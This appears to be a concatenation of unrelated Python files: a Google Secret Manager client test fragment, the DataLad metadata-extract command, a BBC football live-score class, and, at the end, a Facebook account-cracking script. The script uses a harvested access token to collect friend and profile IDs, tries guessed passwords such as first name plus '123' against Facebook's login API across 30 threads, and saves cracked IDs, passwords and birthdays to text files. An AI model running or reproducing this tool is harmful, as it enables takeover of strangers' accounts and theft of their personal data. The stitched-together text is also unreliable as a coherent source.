# Designate an appropriate return value for the call.
call.return_value = None
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_secret(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_secret_flattened_error_async():
client = SecretManagerServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_secret(
service.DeleteSecretRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [service.ListSecretVersionsRequest, dict,])
def test_list_secret_versions(request_type, transport: str = "grpc"):
client = SecretManagerServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_secret_versions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = service.ListSecretVersionsResponse(
next_page_token="next_page_token_value", total_size=1086,
)
response = client.list_secret_versions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == service.ListSecretVersionsRequest()
# Establish | |
# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Run one or more metadata extractors on a dataset or file(s)"""
__docformat__ = 'restructuredtext'
from os import curdir
import os.path as op
import logging
from six import (
iteritems,
text_type,
)
from datalad import cfg
from datalad.interface.base import Interface
from datalad.interface.base import build_doc
from datalad.interface.results import (
get_status_dict,
success_status_map,
)
from datalad.interface.utils import eval_results
from datalad.distribution.dataset import (
datasetmethod,
EnsureDataset,
require_dataset,
)
from .extractors.base import MetadataExtractor
from datalad.support.param import Parameter
from datalad.support.constraints import (
EnsureNone,
EnsureStr,
EnsureChoice,
EnsureBool,
)
from . import (
get_refcommit,
exclude_from_metadata,
get_metadata_type,
collect_jsonld_metadata,
format_jsonld_metadata,
)
from datalad.utils import (
assure_list,
Path,
PurePosixPath,
)
from datalad.dochelpers import exc_str
from datalad.log import log_progress
from datalad.ui import ui
import datalad.support.ansi_colors as ac
from simplejson import dumps as jsondumps
# API commands needed
from datalad.core.local import status as _status
lgr = logging.getLogger('datalad.metadata.extract')
@build_doc
class Extract(Interface):
"""Run one or more metadata extractors on a dataset or file.
This command does not modify a dataset, but may initiate required data
transfers to perform metadata extraction that requires local file content
availability. This command does not support recursion into subdataset.
The result(s) are structured like the metadata DataLad would extract
during metadata aggregation (in fact, this command is employed during
aggregation). There is one result per dataset/file.
Examples:
Extract metadata with two extractors from a dataset in the current
directory and also from all its files::
$ datalad extract-metadata -d . --source xmp --source metalad_core
Extract XMP metadata from a single PDF that is not part of any dataset::
$ datalad extract-metadata --source xmp Downloads/freshfromtheweb.pdf
Customization of extraction:
The following configuration settings can be used to customize extractor
behavior
``datalad.metadata.extract-from-<extractorname> = {all|dataset|content}``
which type of information an enabled extractor will be operating on
(see --process-type argument for details)
``datalad.metadata.exclude-path = <path>``
ignore all content underneath the given path for metadata extraction,
must be relative to the root of the dataset and in POSIX convention,
and can be given multiple times
"""
result_renderer = 'tailored'
_params_ = dict(
sources=Parameter(
args=("--source",),
dest="sources",
metavar=("NAME"),
action='append',
doc="""Name of a metadata extractor to be executed.
If none is given, a set of default configured extractors,
plus any extractors enabled in a dataset's configuration
and invoked.
[CMD: This option can be given more than once CMD][PY: Multiple
extractors can be given as a list PY]."""),
process_type=Parameter(
args=("--process-type",),
doc="""type of information to process. If 'all',
metadata will be extracted for the entire dataset and its content.
If not specified, the dataset's configuration will determine
the selection, and will default to 'all'. Note that not processing
content can influence the dataset metadata composition (e.g. report
of total size). There is an auxiliary category 'extractors' that
will cause all enabled extractors to be loaded, and reports
on their status and configuration.""",
constraints=EnsureChoice(
None, 'all', 'dataset', 'content', 'extractors')),
path=Parameter(
args=("path",),
metavar="FILE",
nargs="*",
doc="Path of a file to extract metadata from.",
constraints=EnsureStr() | EnsureNone()),
dataset=Parameter(
args=("-d", "--dataset"),
doc=""""Dataset to extract metadata from. If no further
constraining path is given, metadata is extracted from all files
of the dataset.""",
constraints=EnsureDataset() | EnsureNone()),
format=Parameter(
args=('--format',),
doc="""format to use for the 'metadata' result property. 'native'
will report the output of extractors as separate metadata
properties that are stored under the name of the associated
extractor; 'jsonld' composes a JSON-LD graph document, while
stripping any information that does not appear to be properly
typed linked data (extractor reports no '@context' field).""",
constraints=EnsureChoice(
'native', 'jsonld')),
)
@staticmethod
@datasetmethod(name='meta_extract')
@eval_results
def __call__(dataset=None, path=None, sources=None, process_type=None,
format='native'):
ds = require_dataset(
dataset or curdir,
purpose="extract metadata",
check_installed=not path)
# check what extractors we want as sources, and whether they are
# available
if not sources:
sources = ['metalad_core', 'metalad_annex'] \
+ assure_list(get_metadata_type(ds))
# keep local, who knows what some extractors might pull in
from pkg_resources import iter_entry_points # delayed heavy import
extractors = {}
for ep in iter_entry_points('datalad.metadata.extractors'):
if ep.name not in sources:
# not needed here
continue
rec = dict(entrypoint=ep)
if ep.name in extractors: # pragma: no cover
# potential conflict
if extractors[ep.name]['entrypoint'].dist.project_name == 'datalad':
# this is OK, just state it is happening
lgr.debug(
'Extractor %s overrides datalad-core variant', ep)
extractors[ep.name] = rec
elif ep.dist.project_name == 'datalad':
# also OK
lgr.debug(
'Prefer extractor %s over datalad-core variant', ep)
else:
msg = (
'At least two DataLad extensions provide metadata '
'extractor %s: %s vs. %s',
ep.name,
ep.dist,
extractors[ep.name].dist)
if ep.name in sources:
# this extractor is required -> blow hard
raise RuntimeError(msg[0] % msg[1:])
else:
# still moan
lgr.warn(msg)
# ignore the newcomer, is listed second in sys.path
else:
# this fresh and unique
extractors[ep.name] = rec
for msrc in sources:
if msrc not in extractors:
# we said that we want to fail, rather then just moan about
# less metadata
raise ValueError(
"Enabled metadata extractor '{}' not available".format(msrc),
)
# load extractor implementation
rec = extractors[msrc]
rec['process_type'] = process_type \
if process_type and not process_type == 'extractors' \
else ds.config.obtain(
'datalad.metadata.extract-from-{}'.format(
msrc.replace('_', '-')),
default='all')
# load the extractor class, no instantiation yet
try:
rec['class'] = rec['entrypoint'].load()
except Exception as e: # pragma: no cover
msg = ('Failed %s metadata extraction from %s: %s',
msrc, ds, exc_str(e))
log_progress(lgr.error, 'metadataextractors', *msg)
raise ValueError(msg[0] % msg[1:])
res_props = dict(
action='meta_extract',
logger=lgr,
)
# build report on extractors and their state info
if process_type == 'extractors':
for ename, eprops in iteritems(extractors):
state = {}
# do not trip over old extractors
if hasattr(eprops['class'], 'get_state'):
state.update(eprops['class']().get_state(ds))
yield dict(
action='meta_extract',
path=ds.path,
status='ok',
logger=lgr,
extractor=ename,
state=dict(
state,
process_type=eprops['process_type'],
)
)
return
# build a representation of the dataset's content (incl subds
# records)
# go through a high-level command (not just the repo methods) to
# get all the checks and sanitization of input arguments
# this call is relatively expensive, but already anticipates
# demand for information by our core extractors that always run
# unconditionally, hence no real slowdown here
# TODO this could be a dict, but MIH cannot think of an access
# pattern that does not involve iteration over all items
status = []
exclude_paths = [
ds.pathobj / PurePosixPath(e)
for e in (
list(exclude_from_metadata) + assure_list(
ds.config.get('datalad.metadata.exclude-path', []))
)
]
if ds.is_installed():
# we can make use of status
res_props.update(refds=ds.path)
for r in ds.status(
# let status sort out all path arg handling
# but this will likely make it impossible to use this
# command to just process an individual file independent
# of a dataset
path=path,
# it is safe to ask for annex info even when a dataset is
# plain Git
# NOTE changing to 'annex=availability' has substantial
# performance costs, as it involved resolving each annex
# symlink on the file-system, which can be really slow
# depending on the FS and the number of annexed files
annex='basic',
# TODO we never want to aggregate metadata from untracked
# content, but we might just want to see what we can get
# from a file
untracked='no',
# this command cannot and will not work recursively
recursive=False,
result_renderer='disabled'):
# path reports are always absolute and anchored on the dataset
# (no repo) path
p = Path(r['path'])
if p in exclude_paths or \
any(e in p.parents for e in exclude_paths):
# this needs to be ignore for any further processing
continue
# strip useless context information
status.append(
{k: v for k, v in iteritems(r)
if (k not in ('refds', 'parentds', 'action', 'status')
and not k.startswith('prev_'))})
# determine the commit that we are describing
refcommit = get_refcommit(ds)
if refcommit is None or not len(status):
# this seems extreme, but without a single commit there is
# nothing | |
<gh_stars>1-10
from datetime import datetime
from itertools import groupby
import json
import requests
from .base import matchcommon
from .exceptions import FSConnectionError
from .matchdict import MatchDict
from .matchdict import MatchDictKeys as MDKey
from .matchevent import MatchEvent
from .playeraction import PlayerAction
from .utils import UTC
from .morphlinks import ML
# dateutil is not part of the standard library so let's see if we can import
# and set a flag showing success or otherwise
try:
import dateutil.parser
HAS_DATEUTIL = True
except ImportError:
HAS_DATEUTIL = False
# We need a UTC timezone to do some datetime manipulations
TZ_UTZ = UTC()
API_BASE = "http://push.api.bbci.co.uk"
class FootballMatch(matchcommon):
'''Class for getting details of individual football matches.
Data is pulled from BBC live scores page.
'''
scoreslink = ("/proxy/data/bbc-morph-football-scores-match-list-data/"
"endDate/{end_date}/startDate/{start_date}/{source}/"
"version/2.4.0/withPlayerActions/{detailed}")
detailprefix = ("http://www.bbc.co.uk/sport/football/live/"
"partial/{id}")
match_format = {"%H": "HomeTeam",
"%A": "AwayTeam",
"%h": "HomeScore",
"%a": "AwayScore",
"%v": "Venue",
"%T": "DisplayTime",
"%S": "Status",
"%R": "HomeRedCards",
"%r": "AwayRedCards",
"%G": "HomeScorerText",
"%g": "AwayScorerText",
"%C": "Competition"}
ACTION_GOAL = "goal"
ACTION_RED_CARD = "red-card"
ACTION_YELLOW_RED_CARD = "yellow-red-card"
STATUS_HALF_TIME = "HALFTIME"
STATUS_FULL_TIME = "FULLTIME"
STATUS_FIXTURE = "FIXTURE"
STATUS_ET_FIRST_HALF = "EXTRATIMEFIRSTHALF"
STATUS_ET_HALF_TIME = "EXTRATIMEHALFTIME"
def __init__(self, team, detailed=True, data=None, on_goal=None,
on_red=None, on_status_change=None, on_new_match=None,
matchdate=None, events_on_first_run=False):
'''Creates an instance of the Match object.
Must be created by passing the name of one team.
data - User can also send data to the class e.g. if multiple instances
of class are being run thereby saving http requests. Otherwise class
can handle request on its own.
detailed - Do we want additional data (e.g. goal scorers, bookings)?
'''
super(FootballMatch, self).__init__()
self.detailed = detailed
self.myteam = team
self.match = MatchDict()
self._matchdate = self._check_match_date(matchdate)
self._on_red = on_red
self._on_goal = on_goal
self._on_status_change = on_status_change
self._on_new_match = on_new_match
self._clearFlags()
if data is None:
self.hasTeamPage = self._findTeamPage()
if not self.hasTeamPage:
data = self._scanLeagues()
else:
self.update(first_run=events_on_first_run)
if data:
self.update(data=data, first_run=events_on_first_run)
def __nonzero__(self):
return bool(self.match)
def __bool__(self):
return self.__nonzero__()
def __repr__(self):
return "<FootballMatch(\'%s\')>" % (self.myteam)
def __eq__(self, other):
if isinstance(other, self.__class__):
try:
return self.match.eventKey == other.match.eventKey
except AttributeError:
return self.myteam == other.myteam
else:
return False
# Semi-hidden methods, only meant to be called by other class methods
def _no_match(default):
"""
Decorator to provide default values for properties when there is no
match found.
e.g.:
@property
@_no_match(str())
def HomeTeam(self):
...
"""
def wrapper(func):
def wrapped(self):
if self.match:
return func(self)
else:
return default
return wrapped
return wrapper
def _override_none(value):
"""
Decorator to provide default values for properties when there is no
current value.
For example, this decorator can be used to convert a None value for a
match score (empty before the match starts) to 0.
e.g.:
@property
@_no_match(int())
@_override_none(0)
def HomeScore(self):
...
"""
def wrapper(func):
def wrapped(self):
if func(self) is None:
return value
else:
return func(self)
return wrapped
return wrapper
def _dump(self, filename):
c = {k: v for k, v in self.match.iteritems() if k != "_callbacks"}
with open(filename, "w") as f:
json.dump(c, f, indent=4)
def _request(self, url):
url = API_BASE + url
try:
r = requests.get(url)
except (requests.exceptions.ConnectionError,
requests.exceptions.Timeout):
raise FSConnectionError
if r.status_code == 200:
return r.json()
else:
return dict()
def _check_match_date(self, matchdate):
if matchdate is None:
return None
try:
datetime.strptime(matchdate, "%Y-%m-%d")
return matchdate
except (ValueError, TypeError):
raise ValueError("Invalid match date. "
"Match date format must by YYYY-MM-DD.")
def _canUpdate(self):
return self.hasTeamPage
def _scanLeagues(self):
raw = self._getScoresFixtures(source=ML.MORPH_FIXTURES_ALL)
comps = raw.get("matchData", None)
if not comps:
return Nonce
for comp in comps:
matches = list(comp["tournamentDatesWithEvents"].values())[0][0]
matches = matches["events"]
for m in matches:
if self.checkTeamInMatch(m):
return m
return None
def checkTeamInMatch(self, m):
home = [m["homeTeam"]["name"][x].lower()
for x in ["first", "full", "abbreviation", "last"]
if m["homeTeam"]["name"][x]]
away = [m["awayTeam"]["name"][x].lower()
for x in ["first", "full", "abbreviation", "last"]
if m["awayTeam"]["name"][x]]
return self.myteam.lower() in (home + away)
def _findTeamPage(self):
team = "-".join(self.myteam.lower().split(" "))
teampage = "https://www.bbc.co.uk/sport/football/teams/" + team
validteam = self.checkPage(teampage)
if validteam:
self.myteampage = "team/{}".format(team)
return True
else:
return False
def _getScoresFixtures(self, start_date=None, end_date=None,
source=None, detailed=None):
if start_date is None:
if self._matchdate:
start_date = self._matchdate
else:
start_date = datetime.now().strftime("%Y-%m-%d")
if end_date is None:
if self._matchdate:
end_date = self._matchdate
else:
end_date = datetime.now().strftime("%Y-%m-%d")
if source is None and self.hasTeamPage:
source = self.myteampage
if detailed is None:
detailed = self.detailed
pl = self.scoreslink.format(start_date=start_date,
end_date=end_date,
source=source,
detailed=str(detailed).lower())
return self._request(pl)
def _findMatch(self, payload):
match = payload["matchData"]
if match:
return list(match[0]["tournamentDatesWithEvents"].values())[0][0]["events"][0] # noqa: E501
else:
return None
def _setCallbacks(self):
self.match.add_callback(MDKey.HOME_TEAM, self._checkHomeTeamEvent)
self.match.add_callback(MDKey.AWAY_TEAM, self._checkAwayTeamEvent)
self.match.add_callback(MDKey.PROGRESS, self._checkStatus)
def _getEvents(self, event, event_type):
events = []
player_actions = event.get("playerActions", list())
for acts in player_actions:
# player = acts["name"]["abbreviation"]
for act in acts["actions"]:
if act["type"] == event_type:
pa = PlayerAction(acts, act)
events.append(pa)
return sorted(events)
def _lastEvent(self, event_type, just_home=False, just_away=False):
events = []
if just_home and just_away:
just_home = just_away = False
if not just_away:
events += self._getEvents(self.match.homeTeam, event_type)
if not just_home:
events += self._getEvents(self.match.awayTeam, event_type)
events = sorted(events)
if events:
return events[-1]
else:
return None
def _lastReds(self, just_home=False, just_away=False):
reds = []
red = self._lastEvent(self.ACTION_RED_CARD,
just_home=just_home,
just_away=just_away)
yellow = self._lastEvent(self.ACTION_YELLOW_RED_CARD,
just_home=just_home,
just_away=just_away)
if red:
reds.append(red)
if yellow:
reds.append(yellow)
if reds:
return sorted(reds)[-1]
else:
return None
def _getReds(self, event):
reds = []
reds += self._getEvents(event, self.ACTION_RED_CARD)
reds += self._getEvents(event, self.ACTION_YELLOW_RED_CARD)
return sorted(reds)
def _getGoals(self, event):
return self._getEvents(event, self.ACTION_GOAL)
def _checkGoal(self, old, new):
return ((old.scores.score != new.scores.score)
and (new.scores.score > 0))
def _checkRed(self, old, new):
old_reds = self._getReds(old)
new_reds = self._getReds(new)
return old_reds != new_reds
def _checkHomeTeamEvent(self, event):
self._checkTeamEvent(event, home=True)
def _checkAwayTeamEvent(self, event):
self._checkTeamEvent(event, home=False)
def _checkTeamEvent(self, event, home=True):
if home:
old = self._old.homeTeam
else:
old = self._old.awayTeam
new = MatchDict(event)
goal = self._checkGoal(old, new)
red = self._checkRed(old, new)
if goal:
if home:
self._homegoal = True
else:
self._awaygoal = True
if red:
if home:
self._homered = True
else:
self._awayred = True
def _checkStatus(self, status):
self._statuschange = True
def _clearFlags(self):
self._homegoal = False
self._awaygoal = False
self._homered = False
self._awayred = False
self._statuschange = False
self._matchfound = False
def _fireEvent(self, func, payload):
try:
func(payload)
except TypeError:
pass
def _fireEvents(self):
if self._homegoal:
func = self.on_goal
payload = MatchEvent(MatchEvent.TYPE_GOAL, self, True)
self._fireEvent(func, payload)
if self._awaygoal:
func = self.on_goal
payload = MatchEvent(MatchEvent.TYPE_GOAL, self, False)
self._fireEvent(func, payload)
if self._homered:
func = self.on_goal
payload = MatchEvent(MatchEvent.TYPE_RED_CARD, self, True)
self._fireEvent(func, payload)
if self._awayred:
func = self.on_goal
payload = MatchEvent(MatchEvent.TYPE_RED_CARD, self, False)
self._fireEvent(func, payload)
if self._statuschange:
func = self.on_status_change
payload = MatchEvent(MatchEvent.TYPE_STATUS, self)
self._fireEvent(func, payload)
if self._matchfound:
func = self.on_new_match
payload = MatchEvent(MatchEvent.TYPE_NEW_MATCH, self)
self._fireEvent(func, payload)
def _groupedEvents(self, events):
def timesort(event):
return (event.ElapsedTime, event.AddedTime)
events = sorted(events, key=lambda x: x.FullName)
events = [list(y) for x, y in groupby(events,
key=lambda x: x.FullName)]
events = sorted(events, key=lambda x: timesort(x[0]))
events = [sorted(x, key=timesort) for x in events]
return events
def _formatEvents(self, events):
events = self._groupedEvents(events)
raw = []
out = u""
for event in events:
name = event[0].AbbreviatedName
times = []
if event[0].isGoal and event[0].isOwnGoal:
name = u"{} (OG)".format(name)
for item in event:
dt = item.DisplayTime
if item.isGoal and item.isPenalty:
dt = u"{} pen".format(dt)
times.append(dt)
raw.append((name, times))
for i, (player, events) in enumerate(raw):
out += player
ev = u" ("
ev += u", ".join(events)
ev += u")"
out += ev
if i < len(raw) - 1:
out += u", "
return out
def formatText(self, text):
values = {k[1]: getattr(self, v) for k, v in self.match_format.items()}
return text.format(**values)
def formatMatch(self, fmt):
for key in self.match_format:
try:
fmt = fmt.replace(key, getattr(self, self.match_format[key]))
except TypeError:
fmt = fmt.replace(key,
str(getattr(self, self.match_format[key])))
return fmt
def formatTimeToKickOff(self, fmt):
ko = self.TimeToKickOff
if ko is None:
return ""
d = {"d": ko.days}
d["h"], rem = divmod(ko.seconds, 3600)
d["m"], d["s"] = divmod(rem, 60)
d["s"] = int(d["s"])
return fmt.format(**d)
def update(self, data=None, first_run=False):
if data is None and not self._canUpdate():
data = self._scanLeagues()
elif data is None:
rawdata = self._getScoresFixtures()
if rawdata:
match = self._findMatch(rawdata)
else:
match = None
if data:
match = data
if match:
if not self.match:
self.match = MatchDict(match, add_callbacks=True)
self._setCallbacks()
self._old = self.match
self._clearFlags()
self._matchfound = True
if not first_run:
self._fireEvents()
else:
self._clearFlags()
self.match.update(match)
if not first_run:
self._fireEvents()
self._old = self.match
return True
# Need this to clear the match if no data (e.g. next day)
elif match is None and self.match:
self._clearFlags()
self.match = MatchDict()
return True
return False
#
| |
'\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass9
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
oks.append(user + pass9 + birthday + subscribers)
elif 'www.facebook.com' in w['error_msg']:
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
print '\x1b[1;93m(!) [Cekpoint]'
print '\x1b[1;93m(+) Nama : \x1b[1;97m ' + c['name']
print '\x1b[1;93m(+) UID : \x1b[1;97m ' + user
print '\x1b[1;93m(+) Katasandi : \x1b[1;97m ' + pass9
print '\x1b[1;93m(+) DD/MM/YY : \x1b[1;97m ' + c['birthday']
print '\x1b[1;93m(+) Followers : \x1b[1;97m ' + c['subscribers'] + '\n'
print '\x1b[1;91m\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90'
cek = open('out/ind1.txt', 'a')
cek.write('UID:' + user + ' Katasandi:' + <PASSWORD>9 + 'Tanggal Lahir:' + birthday + 'Followers:' + subscribers + '\n')
cek.close()
cekpoint.append(user + pass9 + birthday + subscribers)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print '\x1b[1;97m[\x1b[1;93m+\x1b[1;97m] \x1b[1;97mSelesai ....'
print '\x1b[1;97m[\x1b[1;93m+\x1b[1;97m] \x1b[1;97mTotal \x1b[1;92mOK\x1b[1;97m/\x1b[1;93mCP \x1b[1;97m: \x1b[1;92m' + str(len(oks)) + '\x1b[1;97m/\x1b[1;93m' + str(len(cekpoint))
print '\x1b[1;97m[\x1b[1;93m+\x1b[1;97m] \x1b[1;97mCP file tersimpan : out/ind1.txt'
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
raw_input('\x1b[1;93m[\x1b[1;97m Kembali \x1b[1;93m]')
os.system('python2 XXXXX.py')
def bangla():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mToken Invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print '\x1b[1;97m[\x1b[1;94m01\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack dari Daftar Teman'
print '\x1b[1;97m[\x1b[1;94m02\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack dari ID Publik / Teman'
print '\x1b[1;97m[\x1b[1;94m03\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Crack dari File'
print '\x1b[1;97m[\x1b[1;91m00\x1b[1;97m]\x1b[1;96m->\x1b[1;97m Kembali'
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
pilih_bangla()
def pilih_bangla():
reak = raw_input('\x1b[1;93m-> \x1b[91m:\x1b[1;92m ')
if reak == '':
print '\x1b[1;97m[\x1b[1;91m!\x1b[1;97m]\x1b[1;97m Isi Yg Benar !'
pilih_bangla()
elif reak == '1' or reak == '01':
os.system('clear')
print logo
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif reak == '2' or reak == '02':
os.system('clear')
print logo
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print ' \x1b[1;94m \xf0\x9f\xa4\xa1 \x1b[1;97mCRACK BANGLADESH / PAKISTAN \x1b[1;94m\xf0\x9f\xa4\xa1 '
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
dok = raw_input('\x1b[1;97m{\x1b[1;94m+\x1b[1;97m} ID Publik / Teman : ')
try:
jok = requests.get('https://graph.facebook.com/' + dok + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;97m{\x1b[1;94m+\x1b[1;97m} Nama : ' + op['name']
except KeyError:
print '\x1b[1;97m[\x1b[1;94m+\x1b[1;97m] ID Publik / Teman Tidak Ada !'
raw_input('\n[ Kembali ]')
bangla()
except requests.exceptions.ConnectionError:
print '[!] Tidak ada koneksi !'
keluar()
r = requests.get('https://graph.facebook.com/' + dok + '/friends?access_token=' + toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif reak == '3' or reak == '03':
os.system('clear')
print logo
try:
print '\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
idlist = raw_input('\x1b[1;97m{\x1b[1;94m?\x1b[1;97m} Nama File : ')
for line in open(idlist, 'r').readlines():
id.append(line.strip())
except KeyError:
print '\x1b[1;97m[!] File Tidak Ada ! '
raw_input('\n\x1b[1;92m[ \x1b[1;97mKembali \x1b[1;92m]')
except IOError:
print '\x1b[1;97m[!] File Tidak Ada !'
raw_input('\n\x1b[1;93m[ \x1b[1;97mKembali \x1b[1;93m]')
bangla()
if reak == '0' or reak == '00':
menu()
else:
print '\x1b[1;97m[\x1b[1;91m!\x1b[1;97m]\x1b[1;97m Isi Yg Benar !'
pilih_bangla()
print '\x1b[1;97m{\x1b[1;94m+\x1b[1;97m} Total ID : ' + str(len(id))
print '\x1b[1;97m{\x1b[1;94m?\x1b[1;97m} Stop CTRL+Z'
titik = [
'. ',
'.. ',
'... ']
for o in titik:
print '\r\x1b[1;97m{\x1b[1;94m\xe2\x80\xa2\x1b[1;97m} Crack Berjalan ' + o,
sys.stdout.flush()
time.sleep(1)
print '\n\x1b[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
def main(arg):
ubd = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/' + ubd + '/?access_token=' + toket)
x = json.loads(a.text)
bos1 = x['first_name'] + '123'
data1 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga1 = json.load(data1)
if 'access_token' in naga1:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos1
oke.append(ubd + bos1)
elif 'www.facebook.com' in naga1['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos1
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos1 + '\n')
cek.close()
cpe.append(ubd + bos1)
else:
bos2 = x['first_name'] + '1234'
data2 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + <PASSWORD> + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga2 = json.load(data2)
if 'access_token' in naga2:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos2
oke.append(ubd + bos2)
elif 'www.facebook.com' in naga2['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos2
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos2 + '\n')
cek.close()
cpe.append(ubd + bos2)
else:
bos3 = x['first_name'] + '12345'
data3 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + bos3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga3 = json.load(data3)
if 'access_token' in naga3:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos3
oke.append(ubd + bos3)
elif 'www.facebook.com' in naga3['error_msg']:
print '\x1b[1;94m[Cekpoint] ' + ubd + ' \xe2\x80\xa2 ' + bos3
cek = open('out/pakisbang.txt', 'a')
cek.write('ID:' + ubd + ' Pw:' + bos3 + '\n')
cek.close()
cpe.append(ubd + bos3)
else:
bos4 = '786786'
data4 = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=<PASSWORD>&format=json&sdk_version=2&email=' + ubd + '&locale=en_US&password=' + bos4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
naga4 = json.load(data4)
if 'access_token' in naga4:
print '\x1b[1;92m[Berhasil] ' + ubd + ' \xe2\x80\xa2 ' + bos4
oke.append(ubd + bos4)
elif 'www.facebook.com' in naga4['error_msg']:
